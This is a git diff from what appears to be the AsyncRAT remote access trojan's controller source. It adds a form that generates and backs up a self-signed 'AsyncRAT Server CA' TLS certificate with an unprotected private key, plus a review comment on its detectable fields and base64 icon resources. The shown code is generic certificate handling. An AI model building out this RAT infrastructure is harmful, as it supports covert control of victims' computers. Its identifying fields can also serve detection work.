+using Org.BouncyCastle.X509;
+using Org.BouncyCastle.X509.Extension;
+using System.Security.Cryptography.X509Certificates;
+using System.IO;
+using System.IO.Compression;
+
+namespace AsyncRAT_Sharp.Forms
+{
+ public partial class FormCertificate : Form
+ {
+ public FormCertificate()
+ {
+ InitializeComponent();
+ }
+
+ private async void FormCertificate_Load(object sender, EventArgs e)
+ {
+ await Task.Run(() =>
+ {
+ try
+ {
+ string backup = Application.StartupPath + "\\BackupCertificate.zip";
+ if (File.Exists(backup))
+ {
+ MessageBox.Show(this, "Found a zip backup, Extracting (BackupCertificate.zip)", "Certificate backup", MessageBoxButtons.OK, MessageBoxIcon.Information);
+ ZipFile.ExtractToDirectory(backup, Application.StartupPath);
+ Settings.ServerCertificate = new X509Certificate2(Settings.CertificatePath);
+ return;
+ }
+
+ Settings.ServerCertificate = CreateCertificateAuthority("AsyncRAT Server CA", 4096);
+ File.WriteAllBytes(Settings.CertificatePath, Settings.ServerCertificate.Export(X509ContentType.Pkcs12));
+
+ using (ZipArchive archive = ZipFile.Open(backup, ZipArchiveMode.Create))
+ {
+ archive.CreateEntryFromFile(Settings.CertificatePath, Path.GetFileName(Settings.CertificatePath));
+ }
+ MessageBox.Show(this, "Created a ZIP backup (BackupCertificate.zip)", "Certificate backup", MessageBoxButtons.OK, MessageBoxIcon.Information);
+ }
+ catch (Exception ex)
+ {
+ MessageBox.Show(this, ex.Message, "Certificate", MessageBoxButtons.OK, MessageBoxIcon.Exclamation);
+ Environment.Exit(0);
+ }
+ });
+ this.Close();
+ }
+
+ public static X509Certificate2 CreateCertificate(string certName, X509Certificate2 ca, int keyStrength)
+ {
+ var caCert = DotNetUtilities.FromX509Certificate(ca);
+ var random = new SecureRandom(new CryptoApiRandomGenerator());
+ var keyPairGen = new RsaKeyPairGenerator();
+ keyPairGen.Init(new KeyGenerationParameters(random, keyStrength));
+ AsymmetricCipherKeyPair keyPair = keyPairGen.GenerateKeyPair();
+
+ var certificateGenerator = new X509V3CertificateGenerator();
+
+ var CN = new X509Name("CN=" + certName);
+ var SN = BigInteger.ProbablePrime(120, random);
+
+ certificateGenerator.SetSerialNumber(SN);
+ certificateGenerator.SetSubjectDN(CN);
+ certificateGenerator.SetIssuerDN(caCert.IssuerDN);
+ certificateGenerator.SetNotAfter(DateTime.MaxValue);
+ certificateGenerator.SetNotBefore(DateTime.UtcNow.Subtract(new TimeSpan(1, 0, 0, 0)));
+ certificateGenerator.SetPublicKey(keyPair.Public);
+ certificateGenerator.AddExtension(X509Extensions.SubjectKeyIdentifier, false, new SubjectKeyIdentifierStructure(keyPair.Public));
+ certificateGenerator.AddExtension(X509Extensions.AuthorityKeyIdentifier, false, new AuthorityKeyIdentifierStructure(caCert.GetPublicKey()));
+
+ var caKeyPair = DotNetUtilities.GetKeyPair(ca.PrivateKey);
+
+ ISignatureFactory signatureFactory = new Asn1SignatureFactory("SHA512WITHRSA", caKeyPair.Private, random);
+
+ var certificate = certificateGenerator.Generate(signatureFactory);
+
+ certificate.Verify(caCert.GetPublicKey());
+
+ var certificate2 = new X509Certificate2(DotNetUtilities.ToX509Certificate(certificate));
+ certificate2.PrivateKey = DotNetUtilities.ToRSA(keyPair.Private as RsaPrivateCrtKeyParameters);
+
+ return certificate2;
+ }
+
+ public static X509Certificate2 CreateCertificateAuthority(string caName, int keyStrength)
+ {
+ var random = new SecureRandom(new CryptoApiRandomGenerator());
+ var keyPairGen = new RsaKeyPairGenerator();
+ keyPairGen.Init(new KeyGenerationParameters(random, keyStrength));
+ AsymmetricCipherKeyPair keypair = keyPairGen.GenerateKeyPair();
+
+ var certificateGenerator = new X509V3CertificateGenerator();
+
+ var CN = new X509Name("CN=" + caName);
+ var SN = BigInteger.ProbablePrime(120, random);
+
+ certificateGenerator.SetSerialNumber(SN);
+ certificateGenerator.SetSubjectDN(CN);
+ certificateGenerator.SetIssuerDN(CN);
+ certificateGenerator.SetNotAfter(DateTime.MaxValue);
+ certificateGenerator.SetNotBefore(DateTime.UtcNow.Subtract(new TimeSpan(2, 0, 0, 0)));
+ certificateGenerator.SetPublicKey(keypair.Public);
+ certificateGenerator.AddExtension(X509Extensions.SubjectKeyIdentifier, false, new SubjectKeyIdentifierStructure(keypair.Public));
+ certificateGenerator.AddExtension(X509Extensions.BasicConstraints, true, new BasicConstraints(true));
+
+ ISignatureFactory signatureFactory = new Asn1SignatureFactory("SHA512WITHRSA", keypair.Private, random);
+
+ var certificate = certificateGenerator.Generate(signatureFactory);
+
+ var certificate2 = new X509Certificate2(DotNetUtilities.ToX509Certificate(certificate));
+ certificate2.PrivateKey = DotNetUtilities.ToRSA(keypair.Private as RsaPrivateCrtKeyParameters);
+
+ return certificate2;
+ }
+ }
+}
diff --git a/AsyncRAT-C#/AsyncRAT-Sharp/Forms/FormCertificate.resx b/AsyncRAT-C#/AsyncRAT-Sharp/Forms/FormCertificate.resx
new file mode 100644
index 0000000..f4aca47
--- /dev/null
+++ b/AsyncRAT-C#/AsyncRAT-Sharp/Forms/FormCertificate.resx
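Review bot: In FormCertificate.cs the certificate from CreateCertificateAuthority is used directly as the server certificate (`Settings.ServerCertificate = CreateCertificateAuthority("AsyncRAT Server CA", 4096)`), and `CreateCertificate` is never called in this file; no comment says that a self-signed CA doubles as the server identity. Its fields are constants: subject and issuer `CN=AsyncRAT Server CA`, `BasicConstraints(true)`, `SetNotAfter(DateTime.MaxValue)` and `SHA512WITHRSA`, which are what a peer or a TLS-inspecting sensor would see if this certificate is presented in the handshake. FormCertificate_Load also writes the PKCS#12, private key included, to `Settings.CertificatePath` and into `BackupCertificate.zip` under `Application.StartupPath` via `Export(X509ContentType.Pkcs12)` with no password, so the key is readable by anything that can read that directory. I would record both points in `///` summaries on CreateCertificateAuthority and FormCertificate_Load rather than leave them implicit.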
@@ -0,0 +1,577 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + text/microsoft-resx + + + 2.0 + + + System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 + + + System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 + + + + + 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 + O//Yoln/1JhH/8R0Bv/DcQD5w3EAc8NxAADDcQAA3X0AAN19AADdfQCM3X0A/919AP/wxIz///////rt + 2//hjiP/3XwA/919AP/afAD/x3MA/8NxAP/DcAD/yX8a//Tl0f//////58eb/8RzA//DcQD/w3EAoMNx + AAHDcQAA3X0AAN19AALdfQCl3X0A/917AP/kmDb//PTq///////rs2r/3HsA/919AP/afAD/x3IA/8Nx + AP/CbwD/2KRc//79/P/89/H/0pVC/8JvAP/DcQD/w3EAuMNxAAfDcQAA3X0AAN19AAjdfQC83X0A/919 + AP/efwX/89Gk///////23r7/4IgV/96CCv/cgQr/yXgK/8V2Cv/HehH/7dOx///////t1LP/xXYK/8Nx + AP/DcQD/w3EAzcNxABHDcQAA3X0AAN19ABPdfQDR3X0A/919AP/dewD/56JJ//769P/++/j/+OPJ//ff + wf/238L/8d3C//Dcwf/y4Mf//fn1//78+v/XoVf/wm8A/8NxAP/DcQD/w3EA38NxAB7DcQAA3X0AAN19 + ACHdfQDi3X0A/919AP/dfQD/34MN//bbuv////////////////////////////////////////////Lg + x//HexP/w3AA/8NxAP/DcQD/w3EA7cNxAC/DcQAA3X0AAN19ADPdfQDv3X0A/919AP/dfQD/3XsA/+mt + Xv/+/fv//vv3/+/AhP/oq1z/26Zd/9+1ev/89/H//////92ub//CbwD/w3EA/8NxAP/DcQD/w3EA98Nx + AETDcQAA3X0AAN19AEjdfQD53X0A/919AP/dfQD/3XwA/+CIF//45cz//////+27ev/ZeAD/xW4A/9qp + Z///////9urZ/8qCIP/DcAD/w3EA/8NxAP/DcQD/w3EA/sNxAFvDcQAA3X0AAN19AGDdfQD/3X0A/919 + AP/dfQD/3X0A/918AP/tuHX///////nmzv/dhxb/ynkM/+/bvv//////4ryG/8NwAP/DcQD/w3EA/8Nx + 
AP/DcQD/w3EA/8NxAHTDcQAA3X0AAN19AHndfQD/3X0A/919AP/dfQD/3X0A/918AP/ijyT/+u3d///+ + /P/lp1b/15hE//369f/58uf/zosw/8JvAP/DcQD/w3EA/8NxAP/DcQD/w3EA/8NxAI7DcQAA3X0AAN19 + AJPdfQD/3X0A/919AP/dfQD/3X0A/919AP/dfQD/8MSM///////z17P/7c6l///////oyZ7/xHME/8Nx + AP/DcQD/w3EA/8NxAP/DcQD/w3EA/8NxAKfDcQAD3X0ABN19AKvdfQD/3X0A/919AP/dfQD/3X0A/919 + AP/dewD/5Jc0//z06v/+/Pn//vv3//z48v/TlkP/wm8A/8NxAP/DcQD/w3EA/8NxAP/DcQD/w3EA/8Nx + AL3DcQAL3X0ADd19AMHdfQD/3X0A/919AP/dfQD/3X0A/919AP/dfQD/3n8F//PQo////////////+3V + tP/Fdgr/w3EA/8NxAP/DcQD/w3EA/8NxAP/DcQD/w3EA/8NxANHDcQAX3X0AGt19ANXdfQD/3X0A/919 + AP/dfQD/3X0A/919AP/dfQD/3XsA/+ahR//++fT//vz6/9iiWf/CbwD/w3EA/8NxAP/DcQD/w3EA/8Nx + AP/DcQD/w3EA/8NxAOLDcQAo3X0AJ919AN3dfQD/3X0A/919AP/dfQD/3X0A/919AP/dfQD/3X0A/96D + DP/23Lv/8uLL/8d8FP/DcAD/w3EA/8NxAP/DcQD/w3EA/8NxAP/DcQD/w3EA/8NxAOjDcQA33X0ACN19 + AEXdfQCU3X0A1919APrdfQD/3X0A/919AP/dfQD/3X0A/917AP/pq1z/3Kxr/8JvAP/DcQD/w3EA/8Nx + AP/DcQD/w3EA/8NxAPvDcQDcw3EAm8NxAE3DcQAMAAAAAN19AADdfQAC3X0AG919AFbdfQCj3X0A4d19 + AP3dfQD/3X0A/919AP/cgQv/yXkN/8NwAP/DcQD/w3EA/8NxAP3DcQDlw3EAqsNxAF3DcQAfw3EAA8Nx + AAAAAAAAAAAAAAAAAAAAAAAA3X0AAN19AADdfQAE3X0AJN19AGTdfQCw3X0A5919AP3aewD/x3IA/8Nx + AP7DcQDrw3EAtsNxAGzDcQApw3EABcNxAADDcQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA + AAAAAAAA3X0AAN19AADdfQAI3X0ANd19AIXafADZx3MA3sNxAI3DcQA7w3EAC8NxAADDcQAAAAAAAAAA + AAAAAAAAAAAAAAAAAAAAAAAA/4H/AP4AfwD8AD8A8AAPAMAAAwDAAAMAwAABAIAAAQCAAAEAgAABAIAA + AQCAAAEAgAABAIAAAQCAAAEAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwAADAPgAHwD/AP8AKAAAACAA + AABAAAAAAQAgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA + AAAAAAAAAAAAAAAAAAAAAAAAAAAAAN19AADdfQAE3n0AQdp8AL3IcwDKwnEAT8NxAAfDcQAAAAAAAAAA + AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA + AAAAAAAAAAAAAAAAAAAAAAAAAAAAAN19AADdfQAB3X0AKN19AI/dfQDo23wA/8dzAP/DcQDvw3EAncNx + ADLDcQACw3EAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA + AAAAAAAAAAAAAAAAAAAAAAAAAAAAAN19AADdfQAA3X0AG919AHrdfQDe3X0A/919AP/bfAD/x3MA/8Nx + 
AP/DcQD/w3EA5sNxAIjDcQAjw3EAAMNxAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA + AAAAAAAAAAAAAAAAAAAAAAAAAAAAAN19AADdfQAA3X0AEN19AGPdfQDP3X0A/d19AP/dfQD/3X0A/9t8 + AP/HcwD/w3EA/8NxAP/DcQD/w3EA/sNxANnDcQByw3EAF8NxAADDcQAAAAAAAAAAAAAAAAAAAAAAAAAA + AAAAAAAAAAAAAAAAAAAAAAAAAAAAAN19AADdfQAA3X0ACd19AE7dfQC93X0A+d19AP/dfQD/3X0A/919 + AP/dfQD/23wA/8dzAP/DcQD/w3EA/8NxAP/DcQD/w3EA/8NxAPzDcQDIw3EAW8NxAA3DcQAAw3EAAAAA + AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADdfQAA3X0ABN19ADrdfQCo3X0A8919AP/dfQD/3X0A/919 + AP/dfQD/3X0A/919AP/bfAD/x3MA/8NxAP/DcQD/w3EA/8NxAP/DcQD/w3EA/8NxAP/DcQD4w3EAtcNx + AEfDcQAHw3EAAAAAAAAAAAAAAAAAAAAAAADdfQAA3X0AAN19ACPdfQCS3X0A6919AP/cewD/3HsA/9x7 + AP/dfAD/3X0A/919AP/dfQD/3X0A/9t8AP/HcwD/w3EA/8NxAP/DcQD/w3EA/8NwAP/CbwD/wm8A/8Jv + AP/DcQD/w3EA8cNxAKDDcQAuw3EAAMNxAAAAAAAAAAAAAN19AADdfQAA3X0Akd19AP/dfAD/4IgV/+qx + Zv/stW7/67Rt/+KRKf/dfAD/3X0A/919AP/dfQD/23wA/8dzAP/DcQD/w3EA/8NxAP/DcAD/yoMh/9ys + a//drm7/3Kxq/8qBHP/DcAD/w3EA/8NxAKvDcQAEw3EAAAAAAAAAAAAA3X0AAN19AATdfQCv3X0A/918 + AP/fhhH/9+DC////////////8cmV/919Af/dfQD/3X0A/919AP/bfAD/x3MA/8NxAP/DcQD/w3EA/8Nw + AP/huYH////////////05tL/yYAb/8NwAP/DcQD/w3EAx8NxAA7DcQAAAAAAAAAAAADdfQAA3X0ADd19 + AMXdfQD/3X0A/917AP/rsWf///79///////67d3/4o4j/918AP/dfQD/3X0A/9t8AP/HcwD/w3EA/8Nx + AP/DcAD/yH0X//Tkz////////////+C1fP/CcAD/w3EA/8NxAP/DcQDaw3EAGsNxAAAAAAAAAAAAAN19 + AADdfQAZ3X0A2N19AP/dfQD/3XwA/+GLHP/56dP////////+/v/rs2r/3HsA/919AP/dfQD/23wA/8dz + AP/DcQD/w3EA/8JvAP/XoVf//vz6///////47uH/zIcp/8JwAP/DcQD/w3EA/8NxAOnDcQAqw3EAAAAA + AAAAAAAA3X0AAN19ACndfQDo3X0A/919AP/dfQD/3XwA/+69fv////////////bdvf/fhhL/3oAF/96A + Bv/bfwb/yHYG/8R0Bv/EdAX/xncM/+vQrP///////////+bDk//DcQL/w3EA/8NxAP/DcQD/w3EA9MNx + AD7DcQAAAAAAAAAAAADdfQAA3X0APN19APPdfQD/3X0A/919AP/dfAD/45Iq//vw4v///////vr2//be + v//12bX/9dm1//TZtf/v1rX/7ta1/+7Wtf/v2bv//Pjy///////79e3/0JE6/8JvAP/DcQD/w3EA/8Nx + AP/DcQD8w3EAVcNxAAAAAAAAAAAAAN19AADdfQBT3X0A+919AP/dfQD/3X0A/919AP/dfgL/8cmW//// + /////////////////////////////////////////////////////////////+vQqv/EdAf/w3EA/8Nx + 
AP/DcQD/w3EA/8NxAP/DcQBuw3EAAMNxAADdfQAA3X0AAN19AGvdfQD/3X0A/919AP/dfQD/3X0A/917 + AP/lmzz//fbu/////////////vr1//337//99/D//Pfw//v28P/8+fT////////////9+vb/1ZxP/8Jv + AP/DcQD/w3EA/8NxAP/DcQD/w3EA/8NxAIfDcQAAw3EAAN19AADdfQAA3X0Ahd19AP/dfQD/3X0A/919 + AP/dfQD/3X0A/96ACP/01Kz////////////z0KT/5Jcz/+KXNP/SkDT/zowy/+TAjv////////////Db + v//GeQ//w3AA/8NxAP/DcQD/w3EA/8NxAP/DcQD/w3EAocNxAAHDcQAA3X0AAN19AADdfQCf3X0A/919 + AP/dfQD/3X0A/919AP/dfQD/3XsA/+ilUP/++/b///////jmzv/ghxj/2nkA/8ZxAP/Fdgz/7ti5//// + ///+/fz/26ll/8JvAP/DcQD/w3EA/8NxAP/DcQD/w3EA/8NxAP/DcQC4w3EAB8NxAADdfQAA3X0AB919 + ALbdfQD/3X0A/919AP/dfQD/3X0A/919AP/dfAD/34UQ//ffwP///////v37/+msXP/aegD/xnEA/9KW + RP/8+PL///////Tm0v/Jfxv/w3AA/8NxAP/DcQD/w3EA/8NxAP/DcQD/w3EA/8NxAM3DcQARw3EAAN19 + AADdfQAQ3X0AzN19AP/dfQD/3X0A/919AP/dfQD/3X0A/919AP/dewD/6rBm///+/P//////9diy/9yA + Cf/HcwL/58aZ////////////4LZ9/8NwAP/DcQD/w3EA/8NxAP/DcQD/w3EA/8NxAP/DcQD/w3EA38Nx + AB/DcQAA3X0AAN19AB3dfQDe3X0A/919AP/dfQD/3X0A/919AP/dfQD/3X0A/918AP/gihv/+ejS//// + ///99+7/4pg5/9CHJf/47uH///////ju4f/NiCn/wnAA/8NxAP/DcQD/w3EA/8NxAP/DcQD/w3EA/8Nx + AP/DcQDtw3EAMMNxAADdfQAA3X0ALt19AOzdfQD/3X0A/919AP/dfQD/3X0A/919AP/dfQD/3X0A/918 + AP/uvH3////////////txI3/47R2////////////5sOV/8NyAv/DcQD/w3EA/8NxAP/DcQD/w3EA/8Nx + AP/DcQD/w3EA/8NxAPfDcQBEw3EAAN19AADdfQBD3X0A9t19AP/dfQD/3X0A/919AP/dfQD/3X0A/919 + AP/dfQD/3XwA/+KRKf/78OH///////vx5f/47d7///////v17f/Rkjv/wm8A/8NxAP/DcQD/w3EA/8Nx + AP/DcQD/w3EA/8NxAP/DcQD/w3EA/sNxAFzDcQAA3X0AAN19AFrdfQD93X0A/919AP/dfQD/3X0A/919 + AP/dfQD/3X0A/919AP/dfQD/3X0C//HIlP//////////////////////69Cs/8V1B//DcQD/w3EA/8Nx + AP/DcQD/w3EA/8NxAP/DcQD/w3EA/8NxAP/DcQD/w3EAdcNxAADdfQAA3X0Ac919AP/dfQD/3X0A/919 + AP/dfQD/3X0A/919AP/dfQD/3X0A/919AP/dewD/5Zo7//327f////////////369v/WnVD/wm8A/8Nx + AP/DcQD/w3EA/8NxAP/DcQD/w3EA/8NxAP/DcQD/w3EA/8NxAP/DcQCOw3EAAN19AADdfQCM3X0A/919 + AP/dfQD/3X0A/919AP/dfQD/3X0A/919AP/dfQD/3X0A/919AP/egAf/9NSq////////////8NzA/8d5 + EP/DcAD/w3EA/8NxAP/DcQD/w3EA/8NxAP/DcQD/w3EA/8NxAP/DcQD/w3EA/8NxAKfDcQAD3X0AA919 + 
AKbdfQD/3X0A/919AP/dfQD/3X0A/919AP/dfQD/3X0A/919AP/dfQD/3X0A/917AP/npE7//vr2//7+ + /f/bqmb/wm8A/8NxAP/DcQD/w3EA/8NxAP/DcQD/w3EA/8NxAP/DcQD/w3EA/8NxAP/DcQD/w3EAv8Nx + AAzdfQAF3X0Akt19APLdfQD/3X0A/919AP/dfQD/3X0A/919AP/dfQD/3X0A/919AP/dfQD/3XwA/9+E + D//338H/9ejW/8mAG//DcAD/w3EA/8NxAP/DcQD/w3EA/8NxAP/DcQD/w3EA/8NxAP/DcQD/w3EA/8Nx + APXDcQCnw3EAD919AADdfQAM3X0AOt19AIPdfQDL3X0A9d19AP/dfQD/3X0A/919AP/dfQD/3X0A/919 + AP/dfQD/3XsA/+uwZf/gtXv/w3AA/8NxAP/DcQD/w3EA/8NxAP/DcQD/w3EA/8NxAP/DcQD/w3EA+MNx + ANLDcQCNw3EAQsNxABDDcQAAAAAAAAAAAADdfQAA3X0AAN19ABLdfQBH3X0Ak919ANbdfQD53X0A/919 + AP/dfQD/3X0A/919AP/dfQD/3YQQ/8t9FP/DcAD/w3EA/8NxAP/DcQD/w3EA/8NxAP/DcQD7w3EA3MNx + AJzDcQBQw3EAF8NxAAHDcQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAN19AADdfQAC3X0AGt19 + AFXdfQCi3X0A4N19APzdfQD/3X0A/919AP/aewD/x3IA/8NxAP/DcQD/w3EA/8NxAP3DcQDmw3EAq8Nx + AF/DcQAgw3EAA8NxAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA + AADdfQAA3X0AAN19AATdfQAj3X0AY919AK/dfQDn3X0A/dt8AP/HcwD/w3EA/sNxAOvDcQC4w3EAbcNx + ACrDcQAGw3EAAMNxAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA + AAAAAAAAAAAAAAAAAAAAAAAAAAAAAN19AADdfQAA3X0ACN19ADXdfQCD2nwA2MhzAN/DcQCPw3EAPcNx + AAzDcQAAw3EAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD/+B///+AH///A + A///AAD//AAAP/AAAA/gAAAH4AAAA8AAAAPAAAADwAAAA8AAAAPAAAADwAAAA8AAAAPAAAABwAAAAYAA + AAGAAAABgAAAAYAAAAGAAAABgAAAAYAAAAGAAAAAAAAAAAAAAACAAAAB8AAAB/wAAD//gAH///AP/ygA + AAAwAAAAYAAAAAEAIAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA + AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAN19 + AADdfQAE3n0AP9p8ALrIdADMwnEAU8NxAAnDcQAAw3EAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA + AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA + AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA + AADdfQAA3X0AAd19ACbdfQCM3X0A5tt8AP/IcwD/w3EA8MNxAKHDcQA2w3EAA8NxAAAAAAAAAAAAAAAA + AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA + 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA + AAAAAAAA3X0AAN19AADdfQAa3X0Ad919ANvdfQD+3X0A/9t8AP/IcwD/w3EA/8NxAP/DcQDnw3EAjMNx + ACbDcQABw3EAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA + AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA + AAAAAAAAAAAAAN19AADdfQAA3X0AD919AGDdfQDM3X0A/N19AP/dfQD/3X0A/9t8AP/IcwD/w3EA/8Nx + AP/DcQD/w3EA/sNxANvDcQB2w3EAGcNxAADDcQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA + AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA + AAAAAAAAAAAAAAAAAAAAAAAA3X0AAN19AAjdfQBL3X0Aud19APjdfQD/3X0A/919AP/dfQD/3X0A/9t8 + AP/IcwD/w3EA/8NxAP/DcQD/w3EA/8NxAP/DcQD8w3EAy8NxAF/DcQAPw3EAAMNxAAAAAAAAAAAAAAAA + AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA + AAAAAAAAAAAAAAAAAAAAAAAAAAAAAN19AADdfQAE3X0AON19AKXdfQDy3X0A/919AP/dfQD/3X0A/919 + AP/dfQD/3X0A/9t8AP/IcwD/w3EA/8NxAP/DcQD/w3EA/8NxAP/DcQD/w3EA/8NxAPjDcQC4w3EASsNx + AAjDcQAAw3EAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA + AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADdfQAA3X0AAd19ACjdfQCP3X0A6d19AP/dfQD/3X0A/919 + AP/dfQD/3X0A/919AP/dfQD/3X0A/9t8AP/IcwD/w3EA/8NxAP/DcQD/w3EA/8NxAP/DcQD/w3EA/8Nx + AP/DcQD/w3EA8sNxAKTDcQA3w3EAA8NxAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA + AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA3X0AAN19AADdfQAa3X0AeN19ANzdfQD/3X0A/919 + AP/dfQD/3X0A/919AP/dfQD/3X0A/919AP/dfQD/3X0A/9t8AP/IcwD/w3EA/8NxAP/DcQD/w3EA/8Nx + 